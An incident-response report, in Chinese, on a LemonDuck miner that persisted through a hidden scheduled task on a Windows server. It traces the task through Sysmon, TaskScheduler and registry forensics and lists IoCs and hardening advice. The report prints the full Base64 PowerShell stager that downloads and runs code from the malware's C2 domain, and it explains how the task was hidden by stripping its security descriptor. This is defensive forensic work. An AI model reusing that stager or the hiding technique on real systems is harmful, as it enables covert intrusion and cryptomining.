柠檬鸭木马应急响应
2023 年初即可通过注册表时间戳追溯到的持久化任务,即使日志被人为关闭,仍可通过 TaskCache 注册表分支还原完整攻击链。
本次事件中,威胁检测平台(TDP)首先触发「柠檬鸭外联 DNS」告警。经 Sysmon、TaskScheduler 及注册表多维度取证,确认攻击者通过 隐藏计划任务 维持持久化,以 SYSTEM 权限定期下载并执行挖矿载荷。
事件概要
- 受影响主机:【脱敏主机名】(Windows Server 2012 R2 6.3.9600.17415)
- 执行账户:
NT AUTHORITY\SYSTEM - 恶意任务路径:
\Microsoft\Windows\Bluetool - 首次入侵时间:2023-02-18(注册表
Date字段推断) - 最后活跃时间:2025-06-27(TaskScheduler Event 129)
- 恶意域名:
v.beahh.com(已被 Sinkhole 至 127.0.0.1) - 处置结果:任务已清除,主机已隔离
调查过程
1. TDP 告警触发
威胁检测平台(TDP)首先触发「柠檬鸭 (LemonDuck) 外联 DNS」告警:

2. DNSQuerySniffer 验证
在终端侧使用 DNSQuerySniffer 进行实时抓包,确认出现恶意域名 *.beahh.com 的解析请求。
3. Sysmon 日志取证
启用 Sysmon 后,规则记录以下关键事件:
- Event 22(DNS Query):捕获恶意域名解析
- Event 1(Process Create):记录进程创建链



依据 DNS 查询时间戳反查 powershell.exe(PID 14292 / 35192),其父进程为 svchost.exe -k netsvcs,运行权限为 SYSTEM。
4. 推断计划任务持久化
鉴于 SYSTEM 权限及周期性触发特征,高度怀疑攻击者通过计划任务维持持久化。调查过程中排除了 BITS 任务、WMI 及 DLL 劫持等其他常见持久化手段,未发现可疑迹象。

5. TaskScheduler 日志排查
5.1 日志被人为关闭
发现 TaskScheduler/Operational 日志自 2024-03-07 起被人为关闭:

5.2 重新捕获 Event 129
重新开启日志后,于次日捕获 Event 129,显示任务 \Microsoft\Windows\Bluetool 成功启动 powershell.exe:

6. 系统日志留存限制
安全、系统、任务调度三类日志的最早记录仅保留至 2024-03-01,更早的记录已被循环覆盖。因此,只能依赖注册表 Date 字段推断首次入侵时间为 2023-02-18:

7. 进程关联确认
Event 129 中记录的 PID 35192 与 Sysmon Event 1 / 22 中的 PID 完全一致,确认属于同一进程链:

8. GUI 不可见 — 隐藏任务
任务计划程序 GUI 界面及 schtasks /query 命令均未列出该任务,表明其为隐藏任务:

9. 注册表深挖
通过 HKLM\...\TaskCache\Tasks\{2AEA53AE-C804-474A-883D-E6BA787F594B} 找到对应的 GUID:

结合 Tree 分支还原完整路径 \Microsoft\Windows\Bluetool,确认该任务缺失 SD(安全描述符)字段,属于典型的「幽灵化」任务:

关键发现
持久化痕迹
- 注册表路径:
HKLM\...\TaskCache\Tree\Microsoft\Windows\Bluetool - 首次写入时间:
Date字段值为2023-02-18T00:47:36 - 执行命令:
Actions二进制数据中包含powershell -ep bypass -e <Base64>字符串
计划任务触发
TaskScheduler 日志 Event 129(2025-06-27 07:50:00)显示任务启动 powershell.exe(PID 35192)。
进程创建记录
Sysmon Event 1:多次记录 powershell.exe -ep bypass -e …,完整命令行与哈希值均已存档。
恶意脚本内容
PowerShell 4103 / 4104 日志解码结果显示,恶意脚本调用 v.beahh.com 下载并执行载荷:
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE" -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZQBhAGgAaAAuAGMAbwBtAC8AdgAnACsAJABlAG4AdgA6AFUAUwBFAFIARABPAE0AQQBJAE4AKQA=
外联行为
Sysmon Event 22:DNS 查询 v.beahh.com,被内部 DNS Sinkhole 劫持至 127.0.0.1。
威胁情报关联
该行为模式与公开报道的 LemonDuck / Beapy / PCASTLE 恶意软件的持久化方式一致。
事件时间线
首次入侵
从注册表 Date 字段推断,Bluetool 任务首次写入(系统日志已丢失)。
2023-02-18
日志留存起点
当前系统/安全/任务调度日志的最早保留时间点,此前记录已被覆盖。
2024-03-01
日志被人为关闭
TaskScheduler/Operational 日志被手动禁用。
2024-03-07
最后一次活跃
DNS 查询 v.beahh.com(Sysmon Event 22)及多次 PowerShell 执行(Event 4103)。
2025-06-26
任务再次触发
计划任务启动(TaskScheduler Event 129),随后被清除。
2025-06-27
威胁指标(IoC)
| 类型 | 指标 |
|---|---|
| 注册表键 | HKLM\...\TaskCache\Tree\Microsoft\Windows\Bluetool |
| 计划任务路径 | \Microsoft\Windows\Bluetool |
| 任务 GUID | {2AEA53AE-C804-474A-883D-E6BA787F594B} |
| 恶意域名 | v.beahh.com |
| C2 外联 | http://v.beahh.com/v+$env:USERDOMAIN |
| 命令行片段 | powershell.exe -ep bypass -e SQBFAFgA... |
| 受影响主机 | Windows Server 2012 R2 6.3.9600.17415 |
根因分析
入侵途径
柠檬鸭病毒可能通过 MS17-010 或其他服务漏洞获取了 SYSTEM 权限。由于日志轮替,初始入侵载荷及 Event 4698(计划任务创建事件)已丢失,无法直接证实初始入侵路径。
持久化手段
攻击者使用 schtasks /Create 写入 Bluetool 任务,将 Stager 以 Base64 形式隐蔽执行。该任务缺失 SD(安全描述符)字段,导致:
- 任务计划程序 GUI 不显示
schtasks /query命令不列出- 属于典型的「幽灵化」隐藏任务
攻击链总结
处置建议
Warning
该任务虽已清除,但主机曾长期暴露于 SYSTEM 权限下的隐蔽持久化通道,建议进行全面安全评估。
验证清除完整性
检查
HKLM\...\TaskCache\Tree\Microsoft\Windows\Bluetool注册表分支是否已彻底删除,确认无残留 GUID。加固日志策略
- 启用 TaskScheduler/Operational 日志并配置远程日志转发,防止被人为关闭
- 确保安全、系统日志保留周期 ≥ 90 天
网络侧防护
- 在 DNS 层面持续 Sinkhole
*.beahh.com及相关恶意域名 - 监控
powershell.exe -ep bypass异常调用
- 在 DNS 层面持续 Sinkhole
主机加固
- 修补 MS17-010 等已知漏洞
- 限制 PowerShell 执行策略(
-ep restricted或allsigned) - 部署 Sysmon 规则监控计划任务创建事件(Event 4698)
- 当前远程域名
v.beahh.com已被重定向至 127.0.0.1,未观察到新的恶意载荷下载 - 未观察到横向移动迹象,攻击者可能因外联失败而放弃
- 建议对同一网络段其他 Windows Server 2012 R2 主机进行扫描排查